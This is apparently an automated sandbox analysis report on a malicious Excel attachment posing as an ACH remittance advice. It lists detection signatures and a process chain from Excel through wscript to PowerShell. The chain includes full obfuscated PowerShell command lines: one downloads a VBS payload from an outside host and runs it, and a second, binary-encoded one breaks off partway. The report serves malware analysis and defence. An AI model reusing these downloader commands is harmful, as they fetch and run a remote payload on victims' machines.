Edit tour
Windows
Analysis Report
ACH Remittance Advice_CITI25822.xls
Overview
General Information
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Wscript starts Powershell (via cmd or directly)
Very long command line found
Suspicious powershell command line found
Document contains an embedded macro with GUI obfuscation
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains embedded VBA macros
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w7x64
- EXCEL.EXE (PID: 2496 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) - wscript.exe (PID: 1212 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\sfoWQ .js" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 1496 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $ErrorActi onPreferen ce = 'Sile ntlyContin ue' ;$t56f g = [Enum] ::ToObject ([System.N et.Securit yProtocolT ype], 3072 );[System. Net.Servic ePointMana ger]::Secu rityProtoc ol = $t56f g;$we22='e W.teN tc' + 'ejbO-we N('; $b4df ='olnwoD.) tnei' + 'l Cb'; $c3=' )''sbv.ewq \''+pmet:v ne$,''sbv. htig/cnys/ sr.gnitsoh tenuy.ddap ok//:sptth ''(eliFda' ;$TC=$c3,$ b4df,$we22 -Join ''; IEX($TC|% {-join($_[ -1..-$_.Le ngth])});s tart-proce ss($env:te mp+ '\qwe. vbs');remo ve-item ($ env:appdat a + '\sfoW Q.js') MD5: 852D67A27E454BD389FA7F02A8CBE23F) - wscript.exe (PID: 1156 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Loc al\Temp\qw e.vbs" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 2888 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $gf=(00100 100,010001 01,0111001 0,01110010 ,01101111, 01110010,0 1000001,01 100011,011 10100,0110 1001,01101 111,011011 10,0101000 0,01110010 ,01100101, 01100110,0 1100101,01 110010,011 00101,0110 1110,01100 011,011001 01,0010000 0,00111101 ,00100000, 00100111,0 1010011,01 101001,011 01100,0110 0101,01101 110,011101 00,0110110 0,01111001 ,01000011, 01101111,0 1101110,01 110100,011 01001,0110 1110,01110 101,011001 01,0010011 1,00111011 ,00100100, 01110100,0 0110101,00 110110,011 00110,0110 0111,00100 000,001111 01,0010000 0,01011011 ,01000101, 01101110,0 1110101,01 101101,010 11101,0011 1010,00111 010,010101 00,0110111 1,01001111 ,01100010, 01101010,0 1100101,01 100011,011 10100,0010 1000,01011 011,010100 11,0111100 1,01110011 ,01110100, 01100101,0 1101101,00 101110,010 01110,0110 0101,01110 100,001011 10,0101001 1,01100101 ,01100011, 01110101,0 1110010,01 101001,011 10100,0111 1001,01010 000,011100 10,0110111 1,01110100 ,01101111, 01100011,0 1101111,01 101100,010 10100,0111 1001,01110 000,011001 01,0101110 1,00101100 ,00100000, 00110011,0 0110000,00 110111,001 10010,0010 1001,00111 011,010110 11,0101001 1,01111001 ,01110011, 01110100,0 1100101,01 101101,001 01110,0100 1110,01100 101,011101 00,0010111 0,01010011 ,01100101, 01110010,0 1110110,01 101001,011 00011,0110 0101,01010 000,011011 11,0110100 1,01101110 ,01110100, 01001101,0 1100001,01 101110,011 00001,0110 0111,01100 101,011100 10,0101110 1,00111010 ,00111010, 01010011,0 1100101,01 100011,011 10101,0111 0010,01101 001,011101 00,0111100 1,01010000 ,01110010, 01101111,0 1110100,01 101111,011 00011,0110 1111,01101 100,001000 00,0011110 1,00100000 ,00100100, 01110100,0 0110101,00 110110,011 00110,0110 0111,00111 011,010000 01,0110010 0,01100100 ,00101101, 01010100,0 1111001,01 110000,011 00101,0010 0000,00101 101,010000 01,0111001 1,01110011 ,01100101, 01101101,0 1100010,01 101100,011 11001,0100 1110,01100 001,011011 01,0110010 1,00100000 ,01001101, 01101001,0 1100011,01 110010,011 01111,0111 0011,01101 111,011001 10,0111010 0,00101110 ,01010110, 01101001,0 1110011,01 110101,011 00001,0110 1100,01000 010,011000 01,0111001 1,01101001 ,01100011, 00111011,0 1100100,01 101111,001 00000,0111 1011,00100 100,011100 00,0110100 1,01101110 ,01100111, 00100000,0 0111101,00 100000,011 10100,0110 0101,01110 011,011101 00,0010110 1,01100011 ,01101111, 01101110,0 1101110,01 100101,011 00011,0111 0100,01101 001,011011 11,0110111 0,00100000 ,00101101, 01100011,0 1101111,01 101101,011 10000,0010 0000,01100 111,011011 11,0110111 1,01100111 ,01101100, 01100101,0 0101110,01 100011,011 01111,0110 1101,00100 000,001011 01,0110001 1,01101111